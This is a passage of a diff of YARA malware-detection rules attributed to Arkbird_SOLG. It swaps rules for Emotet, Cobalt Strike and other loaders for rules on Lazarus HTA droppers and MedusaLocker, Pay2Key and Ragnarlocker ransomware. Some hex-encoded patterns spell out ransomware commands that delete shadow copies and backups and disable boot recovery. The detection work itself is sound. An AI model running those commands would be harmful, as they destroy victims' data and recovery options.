6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 22 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 06 06 6f 26 00 00 0a de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 73 fe ff ff 20 c4 09 00 00 28 18 00 00 0a dd 57 fe ff ff 26 dd 51 fe ff ff } - $s6 = { 7e ?? 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 6f [2] 00 0a 0a 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f [2] 00 0a 06 6f ?? 00 00 0a de 03 26 de 00 2a } - $s7 = { 28 ?? 00 00 06 0a 02 06 28 ?? 00 00 06 0b 07 6f [2] 00 0a 16 16 17 20 ff 0f 1f 00 17 14 73 [2] 00 0a 16 14 73 [2] 00 0a 6f [2] 00 0a 02 06 07 28 ?? 00 00 06 de 03 26 de 00 2a 00 00 00 } + $s1 = { 25 73 25 30 38 58 } + $s2 = { 68 00 74 00 74 00 70 00 5c 00 73 00 68 00 65 00 6c 00 6c 00 5c 00 6f 00 70 00 65 00 6e 00 5c 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 } + $s3 = { 6b 25 34 64 2d 25 30 32 64 2d 25 30 32 64 } + $s4 = { 47 6c 6f 62 61 6c 5c 47 6c 6f 62 61 6c 41 63 70 72 6f 74 65 63 74 4d 75 74 65 78 } + $s5 = "Proxy-Authorization: NTLM" fullword ascii + $s6 = { 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a } + $s7 = { 48 54 54 50 2f 31 2e 31 20 00 00 00 48 54 54 50 2f 31 2e 30 20 } + $s8 = { 52 00 6f 00 6f 00 74 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 00 00 57 51 4c } + $s9 = { 68 74 74 70 00 00 00 00 25 5b 5e 3a 5d 00 00 00 25 2a 5b 5e 3a 5d 3a 25 64 } + $s10 = { 48 6f 73 74 3a 20 } + $s11 = { 43 6f 6f 6b 69 65 73 3a 20 } + $s12 = "Proxy-Authenticate: NTLM" fullword ascii condition: - uint16(0)==0x5A4D and filesize >25KB and 6 of ($s*) + uint16(0)==0x5a4d and filesize >90KB and 9 of them } -rule ARKBIRD_SOLG_MAL_Emotet_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Lazarus_HTA_Apr_2021_1 : FILE { meta: - description = "Detect Emotet loader" + description = "Detect HTA with the fake picture header as decoy used by Lazarus" author = "Arkbird_SOLG" - id = "ad67c735-7ed9-5440-b693-55dce9840f56" - date = "2021-11-15" - modified = "2021-11-16" - reference = "https://cyber.wtf/2021/11/15/guess-whos-back/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-16/MAL_Emotet_Nov_2021_1.yara#L1-L19" + id = "1a57251e-f0fb-541c-bf8b-f1afecf7f1c7" + date = "2021-04-27" + modified = "2021-04-27" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-27/Lazarus/APT_Lazarus_HTA_Apr_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "9ae3cbf863fdf3addd7ec00b4d6b55024c3159156518ef15fff79f5a92988297" + logic_hash = "40c2e5b662d1999c3ae5be97604bb9ebc809a383d66331cb4b385666ce55be2a" score = 75 - quality = 75 + quality = 63 tags = "FILE" - hash1 = "0865bd192e226da2c40b8bdd33a65ef41ca255a0031b3b36ab6a657ba6675d5e" - hash2 = "14613fa0b6eea4cd9205ffbe1c462178c94298707d19f78a27eec3dece8765f0" + hash1 = "888cfc87b44024c48eed794cc9d6dea9f6ae0cc3468dee940495e839a12ee0db" tlp = "white" - adversary = "TrickBot Gang" + adversary = "Lazarus" strings: - $s1 = { 8b 4d 08 0f b6 02 0f b6 31 2b f0 75 18 0f b6 71 01 0f b6 42 01 2b f0 75 0c 0f b6 71 02 0f b6 42 02 2b f0 74 10 33 c9 85 f6 0f 9f c1 8d 0c 4d ff ff ff ff eb 1a 0f b6 49 03 0f b6 42 03 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 8b c1 eb 56 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 0c 0f b6 51 01 0f b6 46 01 2b d0 74 06 33 c9 85 d2 eb b4 0f b6 49 02 0f b6 46 02 eb be 8b 4d 08 8b 75 0c 0f b6 11 0f b6 06 2b d0 75 e0 0f b6 49 01 0f b6 46 01 eb a4 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 eb 96 33 c0 5e 5b 5d c3 8b ff } - $s2 = { 8b 75 10 83 e0 3f 8b 5d 18 6b c8 38 c1 fa 06 89 75 a0 89 5d c4 89 55 b0 8b 04 95 [2] 03 10 89 4d bc 8b 44 08 18 89 45 9c 8b 45 14 03 c6 89 45 ac ff 15 ?? 40 03 10 80 7b 14 00 89 45 90 75 07 8b cb e8 [2] ff ff 8b 43 0c 8b 75 08 8b fe 8b 40 08 89 45 98 33 c0 ab ab ab 8b 45 a0 8b d0 89 55 d0 3b 45 ac 0f 83 14 03 00 00 8b 7d bc 33 db 89 5d b8 81 7d 98 e9 fd 00 00 8a 02 88 45 cf 8b 45 b0 89 5d c0 c7 45 d4 01 00 00 00 8b 0c 85 } - $s3 = { 53 53 40 6a 05 89 45 d0 8d 45 d8 50 ff 75 d4 8d 45 c0 50 53 ff 75 90 e8 [2] ff ff 83 c4 20 89 45 c8 85 c0 0f 84 00 01 00 00 53 8d 4d a4 51 50 8d 45 d8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 dd 00 00 00 8b 55 d0 8b ca 2b 4d a0 8b 46 08 03 c1 89 45 b8 89 46 04 8b 45 c8 39 45 a4 0f 82 c6 00 00 00 80 7d cf 0a 75 3c 6a 0d 58 53 66 89 45 a8 8d 45 a4 50 6a 01 8d 45 a8 50 ff 75 9c ff 15 ?? 40 03 10 85 c0 0f 84 95 00 00 00 83 7d a4 01 0f 82 93 00 00 00 ff 46 08 ff 46 04 8b 46 04 8b 55 d0 89 45 b8 3b 55 ac 0f 82 6f fd ff ff eb 79 85 } - $s4 = { ba 08 00 00 00 c1 e2 00 8b 45 f0 8b 4c 10 78 03 4d fc 89 4d f8 ba 08 00 00 00 6b c2 0c 8b 4d f0 83 7c 01 78 00 74 09 c7 45 e8 0c 00 00 00 eb 07 c7 45 e8 01 00 00 00 8b 55 e8 89 55 e4 8b 45 e4 8b 4d f0 8b 54 c1 78 89 55 dc 8b 45 e4 8b 4d f0 8b 54 c1 7c 89 55 d8 8b 45 dc 03 45 fc 89 45 d4 8d 4d c8 51 6a 04 8b 55 d8 52 8b 45 d4 50 ff 15 04 40 03 10 8b 4d f8 83 79 0c 00 0f 84 cf } - $s5 = { 83 20 00 33 c9 21 4d e8 53 8b 5d 08 57 33 ff 89 4d e4 89 7d e0 8b 03 85 c0 74 56 8d 4d fc 66 c7 45 fc 2a 3f 51 50 c6 45 fe 00 e8 12 55 00 00 59 59 85 c0 75 1a 8d 45 e0 50 33 c0 50 50 ff 33 e8 13 01 00 00 8b f0 83 c4 10 85 f6 75 74 eb 13 8d 4d e0 51 50 ff 33 e8 ad 01 00 00 83 c4 0c 85 c0 75 1d 83 c3 04 8b 03 } + $s1 = { 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e } + $s2 = { 5b 27 4f 70 65 6e 54 65 78 74 46 69 6c 65 27 2c 27 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 27 } + $s3 = { 5b 27 70 75 73 68 27 5d } + $s4 = { 28 27 4d 5a 27 29 2c 65 5b 27 43 6c 6f 73 65 27 5d 28 29 } + $s5 = { 5b 27 73 68 69 66 74 27 5d 28 29 } + $s6 = { 3b 76 61 72 20 64 61 74 61 3d 5b } + $s7 = { 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 } condition: - uint16(0)==0x5a4d and filesize >30KB and 4 of them + ( uint16(0)==0x4d42 or uint16(0)==0xd8ff or uint32(0)==0x474e5089 or uint32(0)==0x38464947) and filesize >20KB and 5 of ($s*) } -rule ARKBIRD_SOLG_MAL_Redxor_Feb_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Medusalocker_Aug_2021_1 : FILE { meta: - description = "Detect RedXor backdoor (Feb 2021)" + description = "Detect MedusaLocker ransomware" author = "Arkbird_SOLG" - id = "10ae10b7-b351-5dda-9408-aa01a40e3d6a" - date = "2021-03-14" - modified = "2021-05-24" - reference = "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-23/RedXor/MAL_RedXor_Feb_2021_1.yara#L1-L20" + id = "9e647371-b37a-53af-bfb6-cde72855b564" + date = "2021-08-08" + modified = "2021-08-08" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-08/medusalocker/RAN_MedusaLocker_Aug_2021_1.yara#L1-L29" license_url = "N/A" - logic_hash = "b4e3ea24bb19abe7065ed5fc94f65e68ea84b11da7b45936ee991ef6aac6d33d" + logic_hash = "40dd3ec16eefc59cb25c8855fb62cda1d642ec711226c1c964fd26384be7ef15" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919" - hash2 = "0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559" - tlp = "White" - adversary = "Winnti" + hash1 = "4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c" + hash2 = "212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887" + hash3 = "a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212" + hash4 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc" + hash5 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad" + hash6 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31" + tlp = "white" + adversary = "RaaS" strings: - $seq1 = { 0f b7 05 [2] 20 00 66 85 c0 0f 85 cd 00 00 00 48 8d 85 ?? ff ff ff be 10 00 00 00 48 89 c7 e8 [2] ff ff 66 c7 85 ?? ff ff ff 02 00 0f b7 05 [2] 20 00 0f b7 c0 89 c7 e8 [2] ff ff 66 89 85 ?? ff ff ff 48 8b 45 d8 48 89 c7 e8 [2] ff ff 89 85 ?? ff ff ff ba 00 00 00 00 be 01 00 00 00 bf 02 00 00 00 e8 [2] ff ff 89 85 ?? ff ff ff 83 bd ?? ff ff ff ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 } - $seq2 = { 48 8d 8d ?? ff ff ff 8b 85 ?? ff ff ff ba 10 00 00 00 48 89 ce 89 c7 e8 [2] ff ff 83 f8 ff 75 47 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 } - $seq3 = { 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8b 95 [2] fd ff 48 8d 85 [2] fd ff 48 89 ce 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff 8b 85 30 ff ff ff 48 63 d8 8b 85 30 ff ff ff 48 63 c8 48 8d 95 [2] fd ff 48 8d 85 [2] fe ff 49 89 d8 be [2] 40 00 48 89 c7 e8 [2] ff ff 89 85 2c ff ff ff 8b 85 2c ff ff ff 48 63 d0 48 8d 9d [2] fe ff 8b 85 ?? ff ff ff b9 00 00 00 00 48 89 de 89 c7 e8 [2] ff ff 48 83 f8 ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 } - $seq4 = { c7 45 a8 01 00 00 00 c7 45 ac 01 00 00 00 c7 05 [2] 20 00 00 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba ?? 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 48 89 c2 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff 48 89 ce 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff ba ff 0f 00 00 48 89 ce 89 c7 e8 [2] ff ff 89 85 40 ff ff ff 83 bd 40 ff ff ff ff 75 0a c7 85 40 ff ff ff 00 00 00 00 48 8d 85 [2] fd ff be [2] 40 00 48 89 c7 e8 [2] ff ff 48 85 c0 0f 84 d0 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba 02 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff e8 [2] ff ff 89 c7 e8 [2] ff ff 48 89 45 e8 be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff 48 8b 45 e8 48 8b 00 48 89 c6 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff bb [2] 40 00 48 8d 95 [2] fd ff 48 8d 85 [2] fd ff 41 b8 [2] 60 00 48 89 d1 ba [2] 60 00 48 89 de 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff c7 45 ac 00 00 00 } - $seq5 = { 55 48 89 e5 53 89 fb 89 f0 48 89 55 d8 89 4d d4 88 5d e4 88 45 e0 0f b6 45 e4 88 45 f2 0f b6 45 e0 88 45 f3 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb 29 8b 45 f4 48 98 48 03 45 d8 8b 55 f4 48 63 d2 48 03 55 d8 0f b6 0a 0f b6 55 f2 31 ca 88 10 0f b6 45 f3 00 45 f2 83 45 f4 01 8b 45 f4 3b 45 d4 7c cf b8 00 00 00 00 5b } - $seq6 = { 55 48 89 e5 53 48 81 ec 68 0d 00 00 48 89 bd d8 f2 ff ff c7 45 90 31 32 37 2e c7 45 94 30 2e 30 2e 48 c7 45 98 31 00 00 00 c7 45 a0 00 00 00 00 c7 85 70 ff ff ff 30 30 2d 30 c7 85 74 ff ff ff 30 2d 30 30 c7 85 78 ff ff ff 2d 30 30 2d c7 85 7c ff ff ff 30 30 2d 30 c7 45 80 30 00 00 00 48 c7 45 a8 [2] 40 00 } + $s1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide + $s2 = { 83 c4 08 8d 8d ?? fe ff ff e8 [2] ff ff 8d 8d ?? fe ff ff e8 [2] ff ff 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d [2] ff ff e8 [2] 00 00 8d 8d [2] ff ff 51 e8 ?? f9 ff ff 83 c4 04 88 85 2b ff ff ff 8d 8d [2] ff ff e8 [2] 00 00 0f b6 95 2b ff ff ff 85 d2 74 1e 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 33 c0 e9 [2] 00 00 8d 4d fa e8 [2] ff ff 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 0f b6 c0 85 c0 74 0c c7 85 ?? fe ff ff [2] 48 00 eb 0a c7 85 ?? fe ff ff [2] 48 00 8b 8d ?? fe ff ff 89 8d ?? fe ff ff 8d 95 ?? fe ff ff 52 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? f8 ff ff 8d 4d 8c e8 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff b9 [2] 4a 00 e8 [2] ff ff 50 e8 [2] ff ff 83 c4 04 50 8d 4d 8c e8 [2] 00 00 0f b6 c0 85 c0 75 41 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? c6 ff ff c7 85 ?? fe ff ff 00 00 00 00 8d 4d 8c e8 [2] 00 00 8d 4d fa e8 [2] ff ff 8b 85 ?? fe ff ff e9 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d ?? fe ff ff e8 [2] 00 00 8d 8d ?? fd ff ff 51 8d 4d 8c e8 [2] 00 00 50 e8 [2] ff ff 83 c4 04 50 8d 95 ?? fe ff ff 52 b9 [2] 4a 00 e8 [2] 00 00 0f b6 c0 85 c0 75 0c c7 85 ?? fe ff ff 01 00 00 00 eb 0a c7 85 ?? fe ff ff 00 00 00 00 8a 8d ?? fe ff ff 88 8d 2a ff ff ff 8d 8d ?? fd ff ff e8 [2] 00 00 8d 8d ?? fe ff ff } + $s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 } + $s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 } + $s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide + $s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f } + $s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 } + $s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 } + $s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 } + $s10 = { 33 c0 48 89 44 24 40 48 c7 44 24 48 07 00 00 00 66 89 44 24 30 44 8d 40 26 48 8d 15 [2] 09 00 48 8d 4c 24 30 e8 [2] ff ff 48 83 7c 24 40 00 74 42 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 b9 01 00 1f 00 ff 15 [2] 07 00 48 85 c0 75 1f 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 33 c9 ff 15 [2] 07 00 32 db eb 02 b3 01 48 8b 54 24 48 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 d3 00 00 00 e8 [2] 03 00 84 db 0f 85 ad 00 00 00 e8 3e 36 00 00 84 c0 75 05 e8 c5 36 00 00 e8 ?? 94 ff ff 48 8d 1d [2] 0d 00 48 8d 4c 24 30 e8 [2] ff ff 48 8b f8 48 8d 35 [2] 0d 00 0f 1f } condition: - uint32(0)==0x464c457f and filesize >25KB and all of ($seq*) + uint16(0)==0x5A4D and filesize >150KB and 9 of ($s*) } -rule ARKBIRD_SOLG_MAL_Cobaltstrike_Oct_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Pay2Key_Nov_2020_1 : FILE { meta: - description = "Detect Cobalt Strike implant" + description = "Detect Pay2Key ransomware" author = "Arkbird_SOLG" - id = "89d46993-cc1b-536b-b1ab-a0e967d0d397" - date = "2021-10-30" - modified = "2021-10-30" - reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_CobaltStrike_Oct_2021_1.yara#L1-L19" + id = "440b8128-4708-54ba-94c3-c0b522004da6" + date = "2020-12-01" + modified = "2020-12-14" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-14/Pay2Key/Ran_Pay2Key_Nov_2020_1.yar#L1-L31" license_url = "N/A" - logic_hash = "4f1a2306b8279be67829d0d515063caae6a9d7a07078a43c2cbe62f675bcb450" + logic_hash = "f1ea1ed141ba7a1eaaa34c216adebfacaa23ef8776a0216b778ccb34bd000590" score = 75 quality = 75 tags = "FILE" - hash1 = "f520f97e3aa065efc4b7633735530a7ea341f3b332122921cb9257bf55147fb7" - hash2 = "7370c09d07b4695aa11e299a9c17007e9267e1578ce2753259c02a8cf27b18b6" - hash3 = "bfbc1c27a73c33e375eeea164dc876c23bca1fbc0051bb48d3ed3e50df6fa0e8" - tlp = "white" - adversary = "-" + hash1 = "5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00" + hash2 = "d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467" + hash3 = "ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f" strings: - $s1 = { 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 f2 73 17 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 f2 75 ef 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 f2 c3 } - $s2 = { 89 ?? 24 ?? 8b ?? 24 0c 89 ?? 24 ?? 8b ?? 24 ?? c1 ?? 0d 89 ?? 24 0c 48 8b ?? 24 10 89 ?? 24 [2] 8b ?? 24 10 } - $s3 = { b8 10 00 00 00 48 89 45 ?? e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 8b 55 f8 89 11 4c 8b 45 ?? 4c 8b 4d f0 4d 89 08 4c 8b 55 ?? 4c 8b 5d e8 4d 89 1a 48 8b 75 ?? 48 8b 7d e0 48 89 3e c7 00 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 8b 19 4d 8b 00 4d 8b 32 48 8b 0e 48 83 ec 20 4c 89 f2 41 89 d9 ff d0 48 83 c4 20 ?? 45 } - $s4 = { 48 83 ec 48 44 89 4c 24 44 4c 89 44 24 38 48 89 54 24 30 48 89 4c 24 28 c7 44 24 24 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 44 8b 4c 24 44 4c 8b 44 24 38 48 8b 54 24 30 48 8b 4c 24 28 ff d0 90 48 83 c4 } + $s1 = "F:\\2-Sources\\21-FinalCobalt\\Source\\cobalt\\Cobalt\\Cobalt\\Win32\\Release\\Client\\Cobalt.Client.pdb" fullword ascii + $s2 = ".\\Cobalt-Client-log.txt" fullword ascii + $s3 = ".\\Config.ini" fullword wide + $s4 = "Local\\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag" fullword ascii + $s5 = "\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" fullword ascii + $s6 = { 40 00 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 31 00 2e 00 31 00 2e 00 31 00 2e 00 31 00 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 33 00 30 00 30 00 30 00 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 44 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 } + $s7 = "%WINDRIVE%" fullword wide + $s8 = "%WINDIR%" fullword wide + $dbg1 = "message.txt" fullword ascii + $dbg2 = "Failed To Get Data...." fullword ascii + $dbg3 = "lock.locked()" fullword wide + $dbg4 = { 47 65 74 41 64 61 70 74 65 72 73 49 6e 66 6f 20 66 61 69 6c 65 64 20 77 69 74 68 20 65 72 72 6f 72 3a 20 25 64 0a } + $dbg5 = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 74 20 66 61 69 6c 65 64 3a 20 25 78 0a } + $dbg6 = { 43 72 79 70 74 44 65 72 69 76 65 4b 65 79 20 66 61 69 6c 65 64 3a 20 25 78 0a 00 00 25 00 64 } + $dbg7 = { 5b 2d 5d 20 43 72 79 70 74 45 6e 63 72 79 70 74 20 66 61 69 6c 65 64 0a } condition: - uint16(0)==0x5A4D and filesize >20KB and 3 of ($s*) + uint16(0)==0x5a4d and filesize >500KB and (5 of ($s*) and 4 of ($dbg*)) } -rule ARKBIRD_SOLG_MAL_Bazarloader_Oct_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_Ransom_Ragnarlocker_July_2020_1 : FILE { meta: - description = "Detect BazarLoader implant" + description = "Detect Ragnarlocker by strings (July 2020)" author = "Arkbird_SOLG" - id = "d6462e74-fe1d-599e-aac8-0d0942ca42ad" - date = "2021-10-30" - modified = "2021-10-30" - reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_BazarLoader_Oct_2021_1.yara#L1-L17" + id = "9291ed33-8d7d-5b88-9075-b847fdbab179" + date = "2020-07-30" + modified = "2020-07-30" + reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-30/Yara_Ransom_Ragnarlocker_July_2020_1.yar#L3-L34" license_url = "N/A" - logic_hash = "afbe02ef9e69ac5105aaae28240d6863c9c4578c0e8fd7c86c38d975cf8acdc6" + logic_hash = "73d3be9a2d3b315ed6d3d93e2c6f9988d60234530b0398e8949c511f919a8954" score = 75 - quality = 75 + quality = 23 tags = "FILE" - hash1 = "0ba7554e7d120ce355c6995c6af95542499e4ec2f6012ed16b32a85175761a94" - hash2 = "2b29c80a4829d3dc816b99606aa5aeead3533d24137f79b5c9a8407957e97b10" - tlp = "white" - adversary = "-" + hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87" strings: - $s1 = { 48 8b 44 24 60 c6 80 38 01 00 00 01 48 8b 44 24 60 c6 80 39 01 00 00 02 48 8b 44 24 60 c7 40 5c 03 00 00 00 b8 60 00 00 00 48 6b c0 00 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 01 00 00 00 48 8b 44 24 20 c7 40 08 02 00 00 00 48 8b 44 24 20 c7 40 0c 02 00 00 00 48 8b 44 24 20 c7 40 10 00 00 00 00 48 8b 44 24 20 c7 40 14 00 00 00 00 48 8b 44 24 20 c7 40 18 00 00 00 00 b8 60 00 00 00 48 6b c0 01 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 22 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 00 00 